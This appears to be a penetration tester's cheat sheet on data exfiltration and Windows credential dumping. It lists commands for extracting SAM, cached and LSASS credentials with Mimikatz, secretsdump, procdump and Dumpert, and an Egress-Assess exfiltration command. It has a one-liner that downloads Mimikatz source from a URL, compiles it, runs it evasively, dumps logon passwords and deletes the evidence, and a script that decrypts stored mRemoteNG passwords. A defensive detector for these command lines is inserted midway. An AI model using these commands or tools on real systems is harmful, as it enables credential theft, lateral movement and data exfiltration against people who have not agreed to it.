Data Mining - Exfiltration

Exfiltration

https://github.com/FortyNorthSecurity/Egress-Assess
HTTP(S) - DNS - FTP

./Egress-Assess.py --server http[s] --username <username> --password <password>
Invoke-EgressAssess -client http[s] -IP <server-IP/domain> -Username <username> -Password <password> -Datatype ssn

Find interesting files

PowerView

Find-InterestingFile -Path \\server\share [-Include keyword1,keyword2] [-OfficeDocs] [-LastAccessTime (Get-Date).AddDays(-7)]

Credentials

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves it holds the credentials but never sends them, so they do not end up in memory on the server
Non-network logon (Interactive/NetworkCleartext/etc.): the client sends its credentials to the service, so they are held in lsass.exe memory

SAM

reg.exe save hklm\sam <C:\temp>
reg.exe save hklm\system <C:\temp>
lsadump::sam
load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump
scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>

It is possible to retrieve NTLM hashes without touching lsass. https://github.com/eladshamir/Internal-Monologue

Cache

reg.exe save hklm\security <C:\temp>
reg.exe save hklm\system <C:\temp>
lsadump::cache
run post/windows/gather/cachedump

LSASS

https://github.com/GhostPack/SafetyKatz

SafetyKatz.exe

Remove banners before compilation: https://github.com/outflanknl/Dumpert
By default: C:\Windows\temp\dumpert.dmp

dumpert.exe
rundll32.exe dumpert.dll,Dump
-----
procdump.exe -accepteula -ma lsass.exe dump.dmp
-----
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)
use post/windows/gather/smart_hashdump
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]

Logon sessions
lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]
sekurlsa::logonPasswords full
load kiwi
creds_all
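The SAM, Cache, LSASS and logon-session lists above are also what a defender wants to recognise in process-creation telemetry. The following is an added example, not part of these notes: a small detector that runs over constructed Sysmon Event ID 1 / Security 4688-style records (one JSON object per line with "Image" and "CommandLine" fields, an assumed export format) and flags the command lines listed in those sections. The rule names, regexes and sample events are assumptions made here; the benign reg query and the procdump of a non-lsass process are included to show they are not flagged.

```python
#!/usr/bin/env python3
"""Flag process-creation events whose command line matches one of the
credential-dumping commands listed in the SAM, Cache and LSASS sections.

Input format (assumed): one JSON object per line with "Image" and
"CommandLine" fields, as a SIEM might export Sysmon Event ID 1 or
Windows Security 4688 with command-line auditing enabled."""
import json
import re

# rule name -> regex applied to the full command line (case-insensitive)
RULES = {
    "registry hive save (SAM/SECURITY/SYSTEM)": re.compile(
        r"\breg(\.exe)?\s+save\s+(hklm|hkey_local_machine)\\(sam|security|system)\b", re.I),
    "procdump targeting lsass": re.compile(
        r"\bprocdump(64)?(\.exe)?\b.*\blsass(\.exe)?\b", re.I),
    "Dumpert lsass dump": re.compile(r"\bdumpert\.(exe|dll)\b", re.I),
    "Mimikatz / SafetyKatz module invocation": re.compile(
        r"\b(mimikatz|safetykatz)\b|\b(sekurlsa|lsadump|privilege)::", re.I),
    "wce / fgdump": re.compile(r"\b(wce(32|64)?|fgdump)(\.exe)?\b", re.I),
    "InstallUtil /U execution of an arbitrary assembly": re.compile(
        r"\binstallutil(\.exe)?\b.*\s/u\b", re.I),
}

# Constructed sample events (not real telemetry); backslashes are JSON-escaped.
SAMPLE_EVENTS = r'''
{"Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg.exe save hklm\\sam C:\\temp\\sam.save"}
{"Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg.exe query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"}
{"Image": "C:\\tools\\procdump.exe", "CommandLine": "procdump.exe -accepteula -ma lsass.exe dump.dmp"}
{"Image": "C:\\tools\\procdump.exe", "CommandLine": "procdump.exe -accepteula -ma notepad.exe np.dmp"}
{"Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe dumpert.dll,Dump"}
{"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe", "CommandLine": "InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe"}
{"Image": "C:\\Users\\alice\\katz.exe", "CommandLine": "katz.exe log privilege::debug sekurlsa::logonpasswords exit"}
this line is not JSON and must be skipped, not crash the scan
'''.strip().splitlines()


def classify(command_line):
    """Return the names of every rule the command line matches (in RULES order)."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]


def scan(lines):
    """Return a list of (rule, image, command_line) hits for JSON-per-line input."""
    hits = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed record: skip it rather than abort the whole scan
        cmd = event.get("CommandLine", "")
        for rule in classify(cmd):
            hits.append((rule, event.get("Image", "?"), cmd))
    return hits


if __name__ == "__main__":
    for rule, image, cmd in scan(SAMPLE_EVENTS):
        print("[{}] {} :: {}".format(rule, image, cmd))
```

Command-line auditing (or Sysmon) has to be enabled for these rules to see anything; the hive-save rule also fires on `hklm\system` alone, which is deliberate since the SYSTEM hive is what makes a saved SAM or SECURITY hive usable.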

Mimikatz One-Liner

Katz.cs https://gist.github.com/xillwillx/96e2c5011577d8583635ad7bf6d4fb58

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('<URL>','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

mRemoteNG parser

Takes confCons.xml as input (the mRemoteNG connections file)

#!/usr/bin/env python3
import argparse
import base64
import hashlib
import re
import sys

from Cryptodome.Cipher import AES  # pycryptodomex


def uncipher(encrypted_data, password="mR3m"):
    """Decrypt one mRemoteNG Password attribute.

    Layout after base64 decoding: salt (16) | nonce (16) | ciphertext | GCM tag (16).
    Key = PBKDF2-HMAC-SHA1(master password, salt, 1000 iterations, 32 bytes);
    the salt is also the GCM associated data. "mR3m" is the default master password.
    """
    if encrypted_data == "":
        return ""
    encrypted_data = base64.b64decode(encrypted_data)
    salt = encrypted_data[:16]
    associated_data = salt
    nonce = encrypted_data[16:32]
    ciphertext = encrypted_data[32:-16]
    tag = encrypted_data[-16:]
    key = hashlib.pbkdf2_hmac("sha1", password.encode(), salt, 1000, dklen=32)
    cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
    cipher.update(associated_data)
    # raises ValueError when the master password is wrong (tag does not verify)
    plaintext = cipher.decrypt_and_verify(ciphertext, tag)
    return plaintext.decode("utf-8")


def parse(conf, password="mR3m"):
    regex = r"Name=\"(.*?)\".*?Username=\"(.*?)\".*?Password=\"(.*?)\".*?Hostname=\"(.*?)\".*?Protocol=\"(.*?)\""

    with open(conf, "r") as f:
        a = f.read()

    matches = re.finditer(regex, a, re.MULTILINE)

    for match in matches:
        m = match.groups()
        print("Name: {}\nUsername: {}\nPassword: {}\nHostname: {}\nProtocol: {}\n".format(
            m[0], m[1], uncipher(m[2], password), m[3], m[4]))


def main():
    parser = argparse.ArgumentParser(description="Decrypt mRemoteNG passwords.")
    parser.add_argument("-f", "--file", help="confCons.xml containing the mRemoteNG connections")
    parser.add_argument("-p", "--password", help="Custom master password", default="mR3m")

    if len(sys.argv) < 2:
        parser.print_help(sys.stderr)
        sys.exit(1)

    args = parser.parse_args()
    if args.file is not None:
        parse(args.file, args.password)


if __name__ == "__main__":
    main()